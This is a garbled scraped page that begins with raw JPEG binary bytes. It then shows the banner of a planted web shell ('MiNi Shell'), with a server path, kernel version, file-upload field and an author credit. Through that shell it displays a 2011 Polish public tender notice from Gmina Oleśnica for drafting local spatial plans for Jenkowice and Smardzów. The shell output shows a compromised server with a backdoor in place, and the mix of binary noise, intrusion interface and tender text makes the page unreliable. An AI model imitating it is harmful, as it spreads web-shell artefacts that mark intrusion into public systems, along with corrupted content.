JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110311/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110311/42132-N-2011.html

<p class="kh_header"><b>Oleśnica: Opracowanie planu zagospodarowania przestrzennego dla obrębu  Jenkowice i Smardzów gm. Oleśnica</b><br>
<b>Numer ogłoszenia: 42132 - 2011; data zamieszczenia: 11.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oleśnica , ul. 11- go Listopada 24, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3140215, faks 071 3140204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olesnica.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie planu zagospodarowania przestrzennego dla obrębu  Jenkowice i Smardzów gm. Oleśnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla obrębu Jenkowice oraz zmian miejscowego planu zagospodarowania przestrzennego dla obrębu Smardzów gm. Oleśnica. zgodnie z procedurą określoną w Ustawie o planowaniu i zagospodarowaniu przestrzennym oraz ustawie o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ocenie środowiska oraz ocenach oddziaływania na środowisko.
 
1/1Obszar do opracowania projektów planu jest opisany w uchwałach  Rady Gminy Oleśnica:
1) Jenkowice  - Uchwała Rady Gminy Oleśnica z dnia 15 października 2010 r. Nr LIV/261/10- 680,0441 ha.
2) Smardzów -  Uchwała Rady Gminy Oleśnica z dnia 15 października 2010 r. Nr LIV/262/10- 752,9477 ha 

1/2. Zakres przedmiotu zamówienia obejmuje:
1) przygotowanie projektu ogłoszeń do prasy miejscowej oraz obwieszczeń o podjęciu uchwały o przystąpieniu do sporządzania planu, z określeniem formy, miejsca i terminu składania wniosków do planu;
2) przygotowanie projektów zawiadomień o podjęciu uchwały o przystąpieniu do sporządzania planu do
instytucji i organów właściwych do uzgadniania i opiniowania planu i ich przesłanie;
3)przygotowanie propozycji rozpatrzenia wniosków wniesionych do planu dla wójta gminy oraz koncepcji
planu,
4) sporządzenie projektu planu miejscowego, uwzględniającego sposób rozpatrzenia wniosków, wraz z prognozą oddziaływania na środowisko;
5) sporządzenie prognozy skutków finansowych uchwalenia planu miejscowego, z uwzględnieniem art. 36;
6) przygotowanie pism/wniosków i ich przesłanie w zakresie wystąpień o:
a)	opinie o projekcie planu do:
-	gminnej lub innej właściwej, w rozumieniu art. 8, komisji urbanistyczno-architektonicznej,
-	wójtów, burmistrzów gmin albo prezydentów miast, graniczących z obszarem objętym planem, w zakresie rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym,
-	regionalnego dyrektora ochrony środowiska,
-	właściwych organów administracji geologicznej w zakresie terenów zagrożonych osuwaniem się mas ziemnych,
-	Prezesa Urzędu Komunikacji Elektronicznej w zakresie telekomunikacji,
-	właściwego organu Państwowej Straży Pożarnej i wojewódzkiego inspektora ochrony środowiska w zakresie lokalizacji nowych zakładów o zwiększonym lub dużym ryzyku wystąpienia poważnych awarii, zmian, o których mowa w art. 250 ust. 5 i 7 ustawy z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska, w istniejących zakładach o zwiększonym lub dużym ryzyku wystąpienia poważnych awarii i nowych inwestycji oraz rozmieszczenia obszarów przestrzeni publicznej i terenów zabudowy mieszkaniowej w sąsiedztwie zakładów o zwiększonym lub dużym ryzyku wystąpienia poważnych awarii, w przypadku gdy te inwestycje, obszary lub tereny zwiększają ryzyko lub skutki poważnych awarii,
-	właściwego państwowego wojewódzkiego inspektora sanitarnego, oraz
b)	uzgodnienie projektu planu z:
-	wojewodą, zarządem województwa, zarządem powiatu w zakresie odpowiednich zadań rządowych i samorządowych,
-	organami właściwymi do uzgadniania projektu planu na podstawie przepisów odrębnych,
-	właściwym zarządcą drogi, jeżeli sposób zagospodarowania gruntów przyległych do pasa drogowego lub zmiana tego sposobu mogą mieć wpływ na ruch drogowy lub samą drogę,
-	właściwymi organami wojskowymi, ochrony granic oraz bezpieczeństwa państwa,
-	dyrektorem właściwego urzędu morskiego w zakresie zagospodarowania pasa technicznego, pasa ochronnego oraz morskich portów i przystani,
-	właściwym organem nadzoru górniczego w zakresie zagospodarowania terenów górniczych,
-	ministrem właściwym do spraw zdrowia w zakresie zagospodarowania obszarów ochrony uzdrowiskowej,
-	właściwym wojewódzkim konserwatorem zabytków w zakresie kształtowania zabudowy i zagospodarowania terenu, oraz
c)	zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne, jeżeli wymagają tego przepisy odrębne;
7)  wprowadzenie zmian wynikających z uzyskanych opinii i dokonanych uzgodnień oraz przygotowanie projektu planu do wyłożenia do publicznego wglądu;
8)   przygotowanie projektu ogłoszenia o wyłożeniu projektu planu wraz z prognozą oddziaływania na
środowisko do publicznego wglądu;
9)   udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami;
10) przygotowanie propozycji rozpatrzenia uwag wniesionych do projektu planu
11) wprowadzenie zmian do projektu planu miejscowego wynikających z rozpatrzenia uwag, o których mowa w pkt 11, a następnie w niezbędnym zakresie ponowienie uzgodnień;
12) przedstawienie radzie gminy projektu planu miejscowego wraz z listą nieuwzględnionych uwag, o
których mowa w pkt 11;
13) przygotowanie i skompletowanie dla Wojewody Dolnośląskiego pełnej dokumentacji formalno-prawnej i planistycznej niezbędnej do oceny zgodności z przepisami prawa oraz do ogłoszenia w dzienniku urzędowym;
14) wykonanie ewentualnych czynności dodatkowych wynikających z oceny dokonanej przez organ nadzoru.

1/3. Wykonawca sporządzi kopie planu w wersji elektronicznej płyta CD w formacie Portale Dokument Format (PDF) - 1 egzemplarz, DGN - 1 egzlemplarz Photographic Experts Group (JPG) - 1 egzemplarz,  oraz w postaci drukowanej w wymaganej - niezbędnej  ilości :
1) Projekt planu do wewnętrznego opiniowania ,
2) Prognoza oddziaływania na środowisko ,
3) Projekt planu do opiniowania i uzgodnienia .
4) Projekt planu z prognozą oddziaływania na środowisko do wyłożenia,
5) Projekt planu do uchwalenia ,
6) Prognoza skutków finansowych i uchwalenia planu,
7) Pomniejszenie projektu planu do publikacji ,
8) Dokumentacja formalno - prawna  (oprawiona w sposób uniemożliwiający dekompletację),

1/4. W ww planie powinny znajdować się zapisy dotyczące przestrzeni publicznej w centrum wsi tj. obszaru przestrzeni publicznej, o którym mowa w art. 2 pkt 6 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr. 80 poz. 717 z późn. zm.). Ustawa definiuje obszar przestrzeni publicznej jako obszar o szczególnym znaczeniu dla zaspokojenia potrzeb mieszkańców, poprawy jakości ich życia i sprzyjający nawiązywaniu kontaktów społecznych ze względu na jego położenie oraz cechy funkcjonalno-przestrzenne.

1/5. Zapis planu należy wykonać w takiej formie, ażeby dla każdej jednostki elementarnej (najmniejszego obszaru wydzielonego przestrzennie) zawarte były wszystkie ustalenia pozwalające na bezpośredni wydruk jako wypis i wyrys z miejscowego planu zagospodarowania przestrzennego (do dalszych prac projektowych). Ustalenia dla jednostki nie mogą być zawarte w kilku miejscach tego planu. W tekście planu należy używać określeń i terminów stosowanych w istniejącym ustawodawstwie. W każdej sytuacji należy wprowadzić definicję terminu. Używając określonych, stosownych terminów należy przywołać w rozumieniu jakiej podstawy prawnej jest on użyty. Część szczegółowa odnosząca się do jednostki elementarnej musi co najmniej zawierać elementy zawarte w art. 15 ust.2 ustawy oraz wszelkie inne istotne ustalenia. Cała dokumentacja planistyczna powinna być wykonana w technice cyfrowej(szczegóły techniczne i programowanie ustalone zostaną na etapie roboczym) umożliwiającej na bieżące korzystanie z opracowania. Tekst planu i rysunek planu należy tak wykonywać, ażeby można było wykonać wydruk dla danej jednostki elementarnej jako wypis i wyrys z planu.

1/6. Wszystkie mapy i rysunki planu należy wykonać w technice kolorowej z oraz w 1( jednym) egzemplarzu czarno-białym do publikacji w Dzienniku Urzędowym. Tekst planu powinien być nie w formie opisu, lecz w formie dokumentu prawnego, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 20 czerwca 2002 roku w sprawie zasad techniki prawodawczej (Dz. U. nr 100, poz. 908). Wykonawca zobowiązany jest do przygotowania projektu wszystkich dokumentów formalnoprawnych i na każdym etapie zobowiązany jest do sprawdzenia poprawności przebiegu toku formalno-prawnego, a w przypadku wystąpienia nieprawidłowości zobowiązany jest pisemnie poinformować o tym prowadzącego opracowanie ze strony urzędu.

1/7. Opracowania planów powinny zawierać:
a) tekst uchwały,
b) rysunki planu zagospodarowania przestrzennego oraz zmian miejscowego planu zagospodarowania w skali 1:1000 w technice czarno-białej oraz w technice barwnej w formie papierowej i w formie zapisu elektronicznego na płycie CD,
c) prognozę skutków finansowych uchwalenia planu (analizę ekonomiczną skutków uchwalenia planu),
d) prognozę skutków wpływu ustaleń planu na środowisko przyrodnicze,
e) ustalenia i rysunek planu (w pomniejszeniu) w formie elektronicznej na płycie CD,
przygotowane do druku w Dzienniku Urzędowym Województwa Dolnośląskiego,
f) opracowanie ekofizjograficzne,
g) dokumenty formalno-prawne.

1/8. Opracowanie planu dla każdej miejscowości  należy wykonać w 5 egzemplarzach, w teczkach formatu A-4, przy czym materiały części tekstowej projektu należy przekazać Zmawiającemu zapisane także na dwóch płytach CD Word for Windows.  Wymaganą ilość egzemplarzy poszczególnych opracowań podano szczegółowo w umowie. W ramach prac nad stanem istniejącym należy wykonać jako minimum inwentaryzacje terenowe tekstowe i graficzne takie jak: zainwestowania i użytkowania terenów, stan własności jako minimum w grupach własności, infrastrukturę techniczną w zakresie koniecznym do ustaleń projektowych na podstawie dostępnych dokumentacji z naniesieniem instalacji projektowych, niezbędne mapy związane z opracowaniem ekofizjograficznym, w tym występowanie gruntów pochodzenia organicznego, klas gleb, waloryzację kulturową i przyrodniczą. Opracowania studialne itp. należy przekazać Zamawiającemu w 2 egzemplarzach.

1/9. Wykonawca sporządzi przedmiot zamówienia oraz zapewni we własnym zakresie:
a) mapy do celów planowania przestrzennego zgodne z warunkami rozporządzenia Ministra Infrastruktury (na dzień zatwierdzenia),
b) inne mapy topograficzne niezbędne do opracowania ekofizjografii i prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze,
c) inne niezbędne materiały do przygotowania projektu miejscowego planu zagospodarowania przestrzennego,
d) procedurę uzgadniania miejscowego planu zagospodarowania przestrzennego we właściwych organach,
e) uczestnictwo projektantów w procedurze konsultacji społecznych, wyłożenia miejscowego planu zagospodarowania przestrzennego oraz procedurze uchwalenia ich przez Radę Gminy Oleśnica.

1/10. Zamawiający przekaże Wykonawcy zamówienia następujące materiały wyjściowe:
a) kopie map zasadniczych o których mowa w art. 16 ust. 1 ustawy w formacie DGN,
b) kopie wniosków do planu miejscowego,
c) do wglądu wydane decyzje o warunkach zabudowy i zagospodarowania terenu, decyzje o ustaleniu lokalizacji inwestycji celu publicznego oraz o warunkach zabudowy,
d) do wglądu Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Oleśnica .

1/11. Koszty związane z  czynnościami  wynikającymi z art. 17 pkt 1 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym  poniesie Zamawiający.
1/12. Harmonogram realizacji przedmiotu zamówienia określi Wykonawca wg wzoru stanowiącego załącznik Nr 2 - projekt umowy -  do SIWZ.
1/13. W opracowaniu miejscowego planu zagospodarowania przestrzennego należy stosować wymagania określone Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587).
/14. Zamawiający będzie uczestniczył w postępowaniu w trakcie opracowywania miejscowego planu zagospodarowania przestrzennego w przesłaniu materiałów opracowanych przez Wykonawcę. Za treść merytoryczną i przestrzeganie wymagań formalnych odpowiada Wykonawca. Koszt druku i powielania materiałów ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonalni( zakończyli)  w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  - co najmniej 1 usługę  polegającą na opracowaniu planu zagospodarowania przestrzennego, z podaniem wartości, przedmiotu, dat wykonania i odbiorców, oraz załączą dokument potwierdzający, że usługi zostały wykonane  lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, że dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia,  które pełnić będą funkcję głównych projektantów planu zagospodarowania przestrzennego będącą/cych członkiem Izby Urbanistów i posiadająca doświadczenie w samodzielnym projektowaniu przestrzeni oraz kierowania co najmniej opracowaniem jednego planu zagospodarowania przestrzennego, który wszedł w życie wraz z informacją o podstawie dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana terminu obowiązywania umowy  i  zmiany wynagrodzenia może nastąpić  w przypadku:
1) konieczności wykonywania  prac dodatkowych których nie można było przewidzieć  na dzień   
     podpisania umowy;
2) zmiany przepisów dla opracowywania mpzp;     
2. Wprowadzenie zmian może nastąpić na pisemny wniosek Zamawiającego lub Wykonawcy z określeniem   
      warunków dokonania zmiany z uwzględnieniem:  opisu  i uzasadnieniem zmiany,  kosztów zmiany i   
      sposób jej obliczenia  oraz wpływ zmiany na wysokość wynagrodzenia , a także czas  wykonywania     
      zmiany  i jej wpływ zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olesnica.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 56-400 Oleśnica  ul. 11 Listopada 24 pok. nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 09:00, miejsce: Urząd Gminy 56-400 Oleśnica  ul. 11 Listopada 24 pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com